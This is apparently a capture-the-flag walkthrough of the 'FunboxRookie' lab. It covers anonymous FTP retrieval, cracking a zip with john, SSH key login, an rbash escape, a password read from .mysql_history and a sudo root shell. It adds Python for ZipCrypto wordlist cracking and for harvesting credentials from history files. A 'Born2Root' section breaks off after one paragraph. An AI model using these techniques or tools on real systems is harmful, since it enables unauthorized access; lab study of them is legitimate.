Exploitation Guide for FunboxRookie

Summary

This machine is exploited through an anonymous FTP server that exposes a password-protected archive containing an SSH private key (id_rsa), followed by the disclosure of user credentials in a history file. Privilege escalation is via an open sudo configuration that allows the user to run any command with elevated privileges.

We start off by running an nmap scan:

sudo nmap 192.168.120.138

We can then run a more detailed nmap scan, with the -sC flag enabling the default scripts, against the discovered ports:

sudo nmap -p 21,22,80 192.168.120.138 -sC

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_http-title: Apache2 Ubuntu Default Page: It works

The FTP server listening on the default port allows anonymous logins, and the ftp-anon script lists several zip files. Of the files shown in the scan, only tom.zip will prove useful to us. Next, we log in anonymously and retrieve it:

ftp 192.168.120.138
220 ProFTPD 1.3.5e Server (Debian)
331 Anonymous login ok, send your complete email address as your password
230-The local time is: Wed Oct 14 17:11:13 2020
230-This is an experimental FTP server. If you have any unusual problems,
230 Anonymous access granted, restrictions apply
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
1477 bytes received in 0.00 secs (28.1715 MB/s)
221

If we try to open the archive, we find that it is password-protected. We can use zip2john to convert the encrypted archive into a hash file that john understands:

zip2john tom.zip > tom.hash
Ver 2.0 efh 54 tom.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675,

The hash line already tells us what we are up against: the member id_rsa is protected with the legacy PKZIP (ZipCrypto) scheme and a 2-byte check value derived from the file timestamp (2b chk, TS_chk), so each password candidate can be rejected by decrypting the 12-byte encryption header alone, without decompressing anything. That makes a wordlist attack very cheap. We can now use john with the rockyou.txt wordlist to crack the password:

john -wordlist=/usr/share/wordlists/rockyou.txt tom.hash
Use the "-show" option to display all of the cracked passwords reliably
Session

The cracker succeeds and reveals that the password is iubire. Using it, we can unlock the archive:

unzip -P iubire tom.zip
inflating: id_rsa

We now have a private SSH key file, id_rsa. Since it came from the archive tom.zip, we can assume that the corresponding user is named tom. Next, we set the restrictive permissions ssh requires on the key file and connect to the target (StrictHostKeyChecking=no skips host-key verification, which is acceptable only against a throwaway lab box):

chmod 0600 id_rsa
ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138
id
uid=1000(tom) gid=1000(tom)

Restricted Shell

If we try to change directory, or run any of the other restricted commands, we find that our login shell is rbash, which we must escape first:

cd
rbash: cd: restricted

There are many ways to do so, and we choose one of the easiest: exit the current shell and reconnect, forcing the remote command with -t "bash -noprofile" so that an unrestricted bash starts without the login profile that would otherwise hand us rbash. Note that on logout even the clear_console call from the logout script is refused by rbash, because its path contains a slash:

exit
rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.120.138

ssh -o StrictHostKeyChecking=no -i id_rsa -t tom@192.168.120.138 "bash -noprofile"
Load pubkey "id_rsa": invalid
cd

The "Load pubkey" message is a harmless client-side warning (ssh could not derive a public key from the private key file); the connection itself works, and we are now able to traverse and enumerate the system further.

Looking around the user's home directory, we find a MySQL client history file:

cd
ls -la
rw- 1 tom tom 295 Jul 25 12:04

Catting this file, we see the history of several MySQL commands. The client stores spaces as the octal escape \040, which is why the lines look like this:

cat .mysql_history
insert\040into\040support\040(tom,\040xx11yy22!)

The command insert into support (tom, xx11yy22!) is very interesting, as the string xx11yy22! looks like a password. Trying that password for tom in order to enumerate sudo privileges works, and we see that tom is able to run any command with sudo, provided the password is given:

sudo -l
Matching Defaults entries for tom on funbox2:
User tom may run the following commands on funbox2:
    (ALL : ALL) ALL

We can easily use this to get a root shell (sudo followed by any shell, for example sudo -i) and confirm it with id:

sudo -i
id
uid=0(root) gid=0(root)

Guide for Born2Root

Summary

Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.

We initiate our enumeration of the target by launching two nmap scans. The first identifies open ports, and the second attempts to discover more information about each service.
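The zip2john/john step in the FunboxRookie guide above is fast because the legacy PKZIP cipher lets a cracker reject a candidate password from the 12-byte encryption header alone. The following Python is an added example, not code from the original post or from john: it implements the traditional PKWARE key schedule, builds a header the way a 2-byte-check archiver would, and runs a short wordlist against it. All sample data (the fake key contents, the fixed nonce, the wordlist) is constructed. The check value here is taken from the CRC-32; the archive in the walkthrough used the timestamp variant (TS_chk), which differs only in which 16-bit value the last two header bytes must match.

```python
"""ZipCrypto ("traditional PKWARE encryption") check as zip2john/john use it:
decrypt only the 12-byte encryption header and compare its last two bytes
with a 16-bit check value, so no candidate needs to be decompressed.
Added example, not code from the original post or from john; the key
schedule follows the PKWARE APPNOTE, and all sample data is constructed."""
import zlib
from typing import Iterable, Optional

# Standard CRC-32 table (polynomial 0xEDB88320), the same one zlib uses.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_byte(crc: int, b: int) -> int:
    return _CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Traditional PKWARE stream cipher: three 32-bit keys seeded from the
    password and updated with every plaintext byte that passes through."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = _crc32_byte(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_byte(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)  # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def make_header(password: bytes, check16: int, nonce: bytes) -> bytes:
    """Encryption header as a 2-byte-check archiver writes it: 10 nonce bytes
    (random in a real archive) followed by the 16-bit check value, low byte
    first. check16 is the CRC-32's high 16 bits, or the DOS mod time for the
    timestamp variant that zip2john reports as TS_chk."""
    assert len(nonce) == 10
    plain = nonce + bytes([check16 & 0xFF, (check16 >> 8) & 0xFF])
    return ZipCrypto(password).encrypt(plain)


def check_password(password: bytes, header: bytes, check16: int) -> bool:
    """The test a '2b chk' zip2john hash encodes. A wrong password survives
    it with probability 2^-16, so a real cracker confirms survivors against
    the compressed data as well."""
    plain = ZipCrypto(password).decrypt(header)
    return plain[10] == check16 & 0xFF and plain[11] == (check16 >> 8) & 0xFF


def crack(header: bytes, check16: int, wordlist: Iterable[str]) -> Optional[str]:
    for word in wordlist:
        if check_password(word.encode(), header, check16):
            return word
    return None


# Constructed sample: CRC of a fake key file, a fixed nonce, and the
# password the walkthrough recovered with john.
SAMPLE_CHECK16 = zlib.crc32(b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n") >> 16
SAMPLE_NONCE = bytes(range(10))
SAMPLE_HEADER = make_header(b"iubire", SAMPLE_CHECK16, SAMPLE_NONCE)
WORDLIST = ["123456", "password", "iloveyou", "princess", "iubire", "rockyou"]

if __name__ == "__main__":
    print("cracked:", crack(SAMPLE_HEADER, SAMPLE_CHECK16, WORDLIST))
```

Running it prints cracked: iubire. A wrong password passes the 16-bit check once in 65,536 tries, which is why zip2john records the compressed data (the cmplen/decmplen fields in the hash line) so john can confirm a hit; that is still far cheaper than inflating and CRC-checking every candidate, and the absence of any salt or key stretching is what lets rockyou.txt finish in seconds.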
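The history-file step in the FunboxRookie guide above is a general pattern worth automating whenever you land on a user account: undo the client's escaping and flag the statements that carry secrets. The following Python is an added example, not code from the original post. The decoding rule (a backslash followed by three octal digits, as in the \040 spaces shown in the walkthrough) and the credential heuristics are this example's own assumptions, and the sample history is constructed.

```python
"""Hunt for credentials in a MySQL client history file (~/.mysql_history).
Added example, not from the original post; the escape rule and the
credential heuristics are this example's own, and the history is constructed."""
import re
from typing import List, Tuple

# Assumed escape rule: the client writes bytes it will not store verbatim
# as \NNN (octal), which is why spaces show up as \040 in the walkthrough.
_OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")

# Statement shapes that carry a secret by construction.
_EXPLICIT_PATTERNS = [
    (re.compile(r"\bidentified\s+by\b", re.I), "IDENTIFIED BY clause"),
    (re.compile(r"\bset\s+password\b", re.I), "SET PASSWORD statement"),
    (re.compile(r"\bpassword\s*\(", re.I), "PASSWORD() call"),
]


def decode_history_line(raw: str) -> str:
    """'insert\\040into\\040x' -> 'insert into x'."""
    return _OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), raw)


def looks_like_secret(token: str) -> bool:
    """Heuristic: six or more characters mixing letters with digits or
    punctuation. 'tom' fails, 'xx11yy22!' passes."""
    return (len(token) >= 6
            and re.search(r"[A-Za-z]", token) is not None
            and re.search(r"[0-9!@#$%^&*_\-]", token) is not None)


def find_credentials(history: str) -> List[Tuple[str, str]]:
    """Return (decoded statement, reason) for every line worth a second look."""
    hits = []
    for raw in history.splitlines():
        line = decode_history_line(raw).strip()
        if not line:
            continue
        reason = next((why for pat, why in _EXPLICIT_PATTERNS if pat.search(line)), None)
        if reason is None and re.match(r"insert\s+into\b", line, re.I) and "(" in line:
            # Literal values live inside the parentheses; report the first
            # one that looks like a password.
            values = re.findall(r"[^\s(),'\"]+", line[line.index("(") + 1:])
            secret = next((v for v in values if looks_like_secret(v)), None)
            if secret is not None:
                reason = f"INSERT with password-like value {secret!r}"
        if reason is not None:
            hits.append((line, reason))
    return hits


# Constructed history: ordinary statements plus two that leak secrets.
SAMPLE_HISTORY = r"""show\040databases;
use\040support;
create\040table\040support\040(user\040varchar(20),\040pass\040varchar(40));
insert\040into\040support\040(tom,\040xx11yy22!)
select\040*\040from\040support;
create\040user\040'backup'@'localhost'\040identified\040by\040'Wint3r!Backup';
"""

if __name__ == "__main__":
    for statement, why in find_credentials(SAMPLE_HISTORY):
        print(f"{why}: {statement}")
```

The INSERT rule looks at the literal values rather than the statement type, so a plain INSERT of ordinary text is not reported; the CREATE TABLE line in the sample is left alone for the same reason. Loosen looks_like_secret if you expect a password typed on its own line, and point the same function at .bash_history, .psql_history and similar files, which need no decoding.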